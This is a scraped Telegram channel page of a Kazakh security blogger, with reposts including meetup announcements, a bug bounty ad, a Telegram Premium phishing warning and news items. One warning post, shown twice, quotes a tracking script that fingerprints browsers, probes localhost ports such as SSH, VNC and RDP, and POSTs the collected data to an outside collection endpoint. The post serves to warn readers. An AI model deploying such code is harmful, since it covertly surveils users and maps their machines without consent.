MEDET TURIN
Open in Telegram
Эта страница создана чтобы делиться своими наблюдениями в интернете. Сарказм и юморочег тоже присутствует. А еще это мой твиттер на максималках. Фоллоу ми он instagram: @2600kz
Show more904
Subscribers
No data24 hours
+57 days
+730 days
Posts Archive
904
Repost from SecuriXy.kz
+1
Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы.
https://qna.habr.com/q/465498
https://x.com/nightlind/status/911806158230495232
Вот скрипт:
https://jsfiddle.net/Lknb3xez/
Снимается WebGL fingerprint.
Проверяются доступные шрифты, плагины браузера.
Снимается:
1 Часовой пояс
2 Локализация (язык)
3 Характеристики видеокарты и CPU
4 Параметры экрана, доступность WebRTC
5 Пробует подключиться к localhost на разных портах:
127.0.0.1:22 (SSH) 127.0.0.1:5900 (VNC) 127.0.0.1:3389 (RDP) 127.0.0.1:80, 5000, 8080и др.
let portsToScan = [22, 5900, 3389, 5000, 8080];
portsToScan.forEach(port => {
let img = new Image();
img.onload = () => {
reportOpenPort(port);
};
img.onerror = () => {};
img.src = http://127.0.0.1:${port};
});
Отправка собранных данных
fetch('https://example-hh.ru-backend.com/collect', {
method: 'POST',
body: JSON.stringify(collectedData)
});
Скрипт не всегда активен:
Определяет тип устройства, локацию, поведение пользователя (например, неактивен в режиме инкогнито или под VPN).
Внедряется по вероятности или под определённые сценарии.
Совет один - Не открывайте доступ браузеру никуда…904
Repost from SecuriXy.kz
+1
Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы.
https://qna.habr.com/q/465498
https://x.com/nightlind/status/911806158230495232
Вот скрипт:
https://jsfiddle.net/Lknb3xez/
Снимается WebGL fingerprint.
Проверяются доступные шрифты, плагины браузера.
Снимается:
1 Часовой пояс
2 Локализация (язык)
3 Характеристики видеокарты и CPU
4 Параметры экрана, доступность WebRTC
5 Пробует подключиться к localhost на разных портах:
127.0.0.1:22 (SSH)
127.0.0.1:5900 (VNC)
127.0.0.1:3389 (RDP)
127.0.0.1:80, 5000, 8080
и др.
```
let portsToScan = [22, 5900, 3389, 5000, 8080];
portsToScan.forEach(port => {
let img = new Image();
img.onload = () => {
reportOpenPort(port);
};
img.onerror = () => {};
img.src =
http://127.0.0.1:${port};
});
Отправка собранных данных
fetch('https://example-hh.ru-backend.com/collect', {
method: 'POST',
body: JSON.stringify(collectedData)
});
```
Скрипт не всегда активен:
Определяет тип устройства, локацию, поведение пользователя (например, неактивен в режиме инкогнито или под VPN).
Внедряется по вероятности или под определённые сценарии.
Совет один - Не открывайте доступ браузеру никуда…904
Сидя в отеле Ташкента, читаю лекцию для любимого Уральска. Прелести удаленки. 😅
Проводим все через zoom, безопасность которой я тоже затрагиваю в презентации.
А вообще, я надеюсь, что это моя крайняя лекция по этой презе.
Новый материал и новый контент, получат только Актау и Семей. Эксклюзивно, офлайн. Так, что готовьтесь к моему визиту 🤪.
Для остальных мы приготовили «закрытый курс», который естественно бесплатный, и на нашем портале, но будет доступен только для госиков 😇.
904
Repost from N/a
👾RTEAM Bug Bounty – Pre-Registration Open! 🚀
We are launching a new bug bounty platform and inviting security researchers to sign up early. Be among the first to access the platform, hunt for vulnerabilities, and earn rewards!
🔐 Why pre-register?
✅ Get early access when the platform goes live
✅ Be the first to know about the launch and rewards
✅ Join an exclusive community of top bug hunters
🔥 Bug hunters, sign up now! 🔗 https://rteam.kz/bugbounty
📌 For companies: Looking to strengthen your cybersecurity? Connect with us!
✉️ office@rteam.kz
🌍 rteam.kz
#RTEAM #BugBounty #CyberSecurity #EthicalHacking #CTF #Netrunner
904
Привет, чат!
Мне нужен UI/UX дизайнер в команду citizensec.kz. Очень много внутрянки надо нарисовать.
ГПХ, работа в офисе, много всяких приколюх, все дела.
Если хочешь чтобы твой дизайн увидела вся страна, гоу в лобби, я создал.
P.S. А еще будем рисовать спецрепортажи, как adult swim. Будет весело.
Напиши мне.
904
Repost from 2600 Qazaqstan
Хей-хей🔔
🔜Напоминаем вам что 2600 уже завтра!
📍Время и место проведения: 20:30
Chili Grill
https://2gis.kz/astana/geo/70000001023400274
P.S Like, Share, Hack!🔈
904
Repost from 2600 Qazaqstan
Хей-хей👋
🔥 2600 совместо с хакерспейсом "Черный Лед" возвращается в феврале! 🔥
🔈 Готовимся к встрече хакеров и энтузиастов ИБ!
🎤 Вас ждут 3 доклада:
📎Seen It All: Исследование о обнаружении атак на сети Windows на основе анализа сетевого трафика
От: @casterbyte
📎 100 лет: Bell Labs
От: @novitoll
📎Эксплуатация PostgreSQL: RCE через Large Objects и .so библиотеки
От: @its_not_my
📍Дата и место проведения:
6 февраля в 20:30
Астана, Chili Grill
https://2gis.kz/astana/geo/70000001023400274
P.S. Like, Share, Hack! ✨
904
Repost from Aqorda 🇰🇿
⚡️Касым-Жомарт Токаев:
«Понятно, что тотальная цифровизация значительно упрощает взаимодействие государства с гражданами и бизнесом, минимизирует бюрократию и коррупционные риски.
Однако обратной стороной этого процесса является увеличение фактов мошенничества. Все чаще мы сталкиваемся со случаями дезинформации и медиавбросами, направленными на манипуляцию общественным мнением, дискредитацию власти, разжигание розни. Это создает серьезные риски для безопасности граждан и стабильности в стране. Поэтому необходимо рассмотреть вопрос законодательного закрепления ответственности интернет-платформ за распространение деструктивного контента. Но укрепление кибербезопасности ни в коем случае не должно замедлить процесс цифровизации.
В обществе складывается мнение, что усилия государства по защите граждан от кибермошенников недостаточны. Статистика показывает негативную динамику: ежегодно регистрируется свыше 20 тысяч случаев интернет-мошенничеств, из которых около 80% остаются нераскрытыми. Поэтому Правительству совместно с правоохранительными органами и финансовыми регуляторами надо обеспечить максимальную защиту персональных данных граждан»
t.me/aqorda_resmi
904
Всем салем!
По ситуации «2600 Астана» в феврале.
Короче локация подвела. Сейчас экстренно в поисках где провести сие мероприятие.
Очень крутые спикеры и доклады готовы, а вот место проведения необходимо организовать.
Если у вас есть такое место/заведение, напишите в личку @NWNC0.
7 февраля надо провести.
904
Вчера посмотрел докфильм. Зацепило, что кейсы рассказывают сами жертвы.
Рекомендую к ознакомлению.
https://youtu.be/zottrhduaJw?feature=shared
904
Repost from Казахстан Подешевле
Как посмотреть записи с камер Сергек?
Если вам пришел штраф за нарушение ПДД, то можно просмотреть не только протокол, но и фото/видео с камер Сергек.
Вот путь: заходите на сайт qamqor.gov.kz → Обжалование административных правонарушений → Авторизуетесь в личном кабинете по ЭЦП → Ваши административные правонарушения.
Далее нажмите на значок документа в правой части экрана и затем на "Просмотреть фото-видео" (понадобится подпись через ЭЦП). Ваша заявка будет в обработке и через пару минут отобразятся доступные медиафайлы.
Автор ролика показал, как это делается.
https://t.me/podeshevlekz
904
Хей хей! Всех с праздником!
Хочу поблагодарить каждого из вас за то, что вы со мной.
Пусть 2025 год для вас будет наполнен яркими событиями, принесет много побед, а главное будет успешным!
Берегите себя и своих близких.
Оставайтесь в безопасности 🙂
904
Короче такое придет, жмете кнопочку «пожаловаться».
Не суйте свои коды, пароли и пальцы куда не надо.
904
Хей хей!
Хотите подарочек на Новый год в виде подписки на Telegram Premium для всех моих читателей?
Активировать.
…
Фишинг по-прежнему не теряет своей актуальности. На этот раз скамеры решили сыграть на новогоднем настроении и массово рассылают “подарки” для доверчивых пользователей в виде годовой подписки на Telegram Premium.
Переходя по ссылке, жертва сталкивается с предложением ввести данные для входа в аккаунт и код подтверждения. После этого на сайте запускается таймер на 24 часа, якобы необходимых для “активации подарка”.
Пока пользователь ждет заветной премиум-подписки, его аккаунт успешно угоняется и затем либо продается, либо используется в других мошеннических схемах, при этом попутно рассылая дальше по контакт листу жертвы этот «подарок».
Будьте внимательны: настоящие подарки не требуют ваших данных для входа!
Схема не новая, в прошлом году под НГ она уже была. Но вот опять…
904
Repost from 112 KZ
⚡️Справочная информация по крушению самолета
На данный час госпитализированы 29 человек, из них 2 детей.
В настоящее время продолжаются аварийно-спасательные работы.
В Командном центре г. Астаны и в ДЧС Мангистауской области функционируют телефоны горячих линий, где поступило 296 звонков.
Списки погибших и пострадавших уточняются.
В г. Актау прибыл министр по чрезвычайным ситуациям Республики Азербайджан генерал-полковник Кямаладдин Фаттах оглы Гейдаров.
@emergovkz / t.me / insta / tiktok / youtube
